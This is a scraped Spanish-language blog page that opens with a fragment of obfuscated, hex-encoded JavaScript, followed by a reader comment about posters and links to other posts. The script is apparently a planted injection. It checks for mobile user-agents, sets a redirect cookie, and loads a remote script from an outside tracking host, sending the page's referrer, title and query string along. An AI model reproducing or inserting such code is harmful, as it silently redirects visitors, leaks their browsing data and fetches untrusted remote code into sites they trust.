)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0xd052=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x33\x63\x58\x66\x71\x6B\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

1 Comentario, RSS

  1. @ autazos 13/06/2017 @ 10:01 pm

    Que buena nota!
    Los últimos dos poster me parecen los peores, el Photoshop les liquidó la creatividad? No miraron los anteriores?

Tu email no será publicado. Required fields are marked *

*


*

ALFA

Comienza una nueva semana y desde aquí les enviamos los más cálidos deseos de que... Seguir Leyendo >>

10933920_785614561517614_890621287844698238_n

Hace ya un par de años que enero se ensaña conmigo pidiendo que me rinda ante su... Seguir Leyendo >>

17